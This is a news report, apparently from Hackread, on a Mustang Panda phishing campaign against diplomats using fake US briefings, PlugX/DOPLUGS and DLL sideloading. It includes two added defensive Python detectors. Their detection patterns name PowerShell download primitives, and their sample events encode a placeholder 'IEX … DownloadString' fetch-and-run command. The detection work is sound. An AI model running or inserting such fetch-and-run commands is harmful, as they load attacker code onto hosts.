In a targeted operation running between late December 2025 and mid-January 2026, government officials and international diplomats were hit by a quiet but effective cyber attack. Security researchers at the firm Dream found that hackers from the China-backed Mustang Panda group (aka HoneyMyte) were masquerading as US and international bodies, using fake documents to trick high-level targets into installing surveillance tools.
A Trap Built on Credibility
The campaign, details of which were shared exclusively with Hackread.com, relied on a simple disguise rather than high-tech software vulnerabilities. Attackers sent out emails that looked like standard diplomatic mail, with subject lines about policy updates or internal briefings.
These documents were designed to look like the authoritative summaries typically shared by the United States after high-level meetings. Because these briefings are seen as dependable, officials across Asia and Eastern Europe opened them without suspicion. Trust, as we know it, is a powerful tool for hackers; researchers noted that in this case, “opening the file alone was sufficient to trigger the compromise.”

The Group Behind the Hack
Further investigation revealed that the group responsible is likely Mustang Panda, a hacking collective linked to China that has been active since 2012.
“The combination of delivery techniques, loader architecture, malware characteristics, lure theming, and overlapping infrastructure observed in this campaign aligns with publicly documented activity attributed to Mustang Panda,” Dream’s report reads.
According to Dream Research Labs, the hackers used a surveillance tool known as PlugX, specifically a version called DOPLUGS. While some malware is designed to break things, this particular tool is built for “quiet data collection.”
DOPLUGS is a “downloader” variant of PlugX. Its main job is to get a foothold on a computer and then use PowerShell (Windows’ built-in scripting and automation shell) to fetch more dangerous tools onto the device later. Researchers noted in their blog post that the attackers used custom encryption routines to keep their activities hidden from standard security checks.
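The downloader stage described above leaves a recognisable trace in process-creation telemetry: PowerShell started by a parent in a user-writable folder, often with a hidden window and an encoded or download-style command line. The following added example (not code from the article or from Dream) shows the kind of triage rule a defender can run over such events. The event records are constructed in a simplified dictionary form rather than taken from real telemetry, and the encoded command is built inline so that the decode-before-scan step can be demonstrated.

```python
"""Triage PowerShell process-creation events for downloader-style behaviour (added example)."""
import base64
import re
from pathlib import PureWindowsPath

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Parent processes launched from these locations deserve a closer look.
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")

# Cmdlets and .NET calls commonly used to pull a second stage onto the host.
DOWNLOAD_PRIMITIVES = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient|"
    r"start-bitstransfer|invoke-restmethod|\biex\b|invoke-expression",
    re.I,
)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or None."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def analyse_event(event: dict) -> list:
    """Return the list of reasons an event looks suspicious; empty means benign."""
    reasons = []
    if PureWindowsPath(event["image"]).name.lower() not in POWERSHELL_IMAGES:
        return reasons
    parent = event["parent"].lower()
    if any(token in parent for token in USER_WRITABLE):
        reasons.append("parent launched from user-writable path")
    text = event["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded command (decoded for inspection)")
        text = text + " " + decoded  # scan the decoded payload as well
    if HIDDEN_WINDOW.search(text):
        reasons.append("hidden window")
    if DOWNLOAD_PRIMITIVES.search(text):
        reasons.append("download/execute primitive")
    return reasons


def flagged_events(events) -> dict:
    """Map event id -> reasons for every event with at least one indicator."""
    return {e["id"]: r for e in events if (r := analyse_event(e))}


# Constructed sample events (not real telemetry); paths and hostnames are placeholders.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    {"id": 1, "image": PS, "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
    {"id": 2, "image": PS, "parent": r"C:\Users\diplomat\AppData\Local\Temp\Summary\viewer.exe",
     "cmdline": f"powershell.exe -w hidden -enc {ENCODED}"},
    {"id": 3, "image": PS, "parent": r"C:\Program Files\Vendor\updater.exe",
     "cmdline": 'powershell.exe -Command "Invoke-WebRequest -Uri http://example.invalid/s -OutFile C:\\Users\\Public\\s.bin"'},
    {"id": 4, "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},
]

if __name__ == "__main__":
    for event_id, reasons in flagged_events(SAMPLE_EVENTS).items():
        print(event_id, "->", "; ".join(reasons))
```

Event 1 is ordinary interactive use and produces no reasons; event 2 accumulates four (writable parent, encoded command, hidden window, and a download primitive that is only visible after decoding); event 3 is flagged on the download cmdlet alone, which is why decoding the `-enc` argument before pattern matching matters in practice.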
Identifying the Threat
Dream’s analysis of the attack reveals that the hackers used a trick involving DLL search-order hijacking. To put it simply, this is a method where a safe, legitimate computer programme is made to load a hidden, poisoned library that has been placed where Windows looks first, instead of the genuine copy it was meant to load.
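The tell-tale artefact of the technique described above is a library that carries the name of a Windows system DLL but sits next to an executable in a user-writable folder, with content that does not match the genuine copy. The following added example (not code from the article or from Dream) audits a directory listing for exactly that pattern. The file entries, their contents and the reference hashes are all constructed placeholders; the set of system DLL names is a small illustrative subset, and the `signed` flag stands in for an Authenticode check that the caller would perform.

```python
"""Audit a directory listing for DLL search-order hijacking candidates (added example)."""
import hashlib
from dataclasses import dataclass

# Illustrative subset of DLL names that normally resolve from System32.
SYSTEM_DLL_NAMES = {"version.dll", "dbghelp.dll", "wininet.dll", "userenv.dll", "cryptbase.dll"}
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")


@dataclass
class FileEntry:
    path: str
    content: bytes  # in real use read from disk; constructed here
    signed: bool    # outcome of an Authenticode check supplied by the caller


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def audit_directory(entries, reference_hashes: dict) -> dict:
    """Return {path: [reasons]} for DLLs whose name shadows a system DLL but whose
    content differs from the reference copy; extra context reasons are appended."""
    findings = {}
    for entry in entries:
        name = basename(entry.path)
        if not name.endswith(".dll") or name not in SYSTEM_DLL_NAMES:
            continue
        reference = reference_hashes.get(name)
        if reference is not None and sha256_hex(entry.content) == reference:
            continue  # identical to the genuine copy: not a sideloading candidate
        reasons = ["name shadows a System32 DLL but content differs from the reference copy"]
        if not entry.signed:
            reasons.append("not Authenticode-signed")
        if any(token in entry.path.lower() for token in USER_WRITABLE):
            reasons.append("located in a user-writable directory beside an executable")
        findings[entry.path] = reasons
    return findings


# Constructed reference hashes standing in for the hashes of the genuine System32 copies.
GENUINE_VERSION = b"constructed bytes standing in for the genuine version.dll"
GENUINE_DBGHELP = b"constructed bytes standing in for the genuine dbghelp.dll"
REFERENCE_HASHES = {
    "version.dll": sha256_hex(GENUINE_VERSION),
    "dbghelp.dll": sha256_hex(GENUINE_DBGHELP),
}

APP_DIR = r"C:\Users\diplomat\AppData\Local\Temp\Summary"
# Constructed listing of an extracted archive: a signed viewer, a mismatched version.dll
# dropped beside it, a genuine dbghelp.dll copy, and an unrelated vendor DLL elsewhere.
SAMPLE_ENTRIES = [
    FileEntry(APP_DIR + r"\viewer.exe", b"signed vendor executable (constructed)", True),
    FileEntry(APP_DIR + r"\version.dll", b"constructed bytes of a planted loader", False),
    FileEntry(APP_DIR + r"\dbghelp.dll", GENUINE_DBGHELP, True),
    FileEntry(r"C:\Program Files\Vendor\helper.dll", b"vendor helper (constructed)", False),
]

if __name__ == "__main__":
    for path, reasons in audit_directory(SAMPLE_ENTRIES, REFERENCE_HASHES).items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

Only the planted `version.dll` is reported: `dbghelp.dll` matches its reference hash and is skipped, and the vendor helper does not carry a system DLL name. On a real host the reference hashes would come from the corresponding files under `System32`, and the signature flag from a signature-verification step.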
The team at Dream, based in Tel Aviv, first spotted the threat in mid-January 2026 after an AI-based hunting agent flagged a strange archive. It turned out to be a coordinated effort to spy on those involved in elections and international coordination. Shalev Hulio, the Co-Founder and CEO of Dream, said this activity “undermines the trust mechanisms that underpin state-level decision making.”
As geopolitical events unfold, researchers expect these types of fake briefings to remain a high-priority threat for those in government. A key tip for staying safe is to treat any unexpected ‘summary’ or ‘briefing’ document with caution, even if it looks like it came from a trusted partner.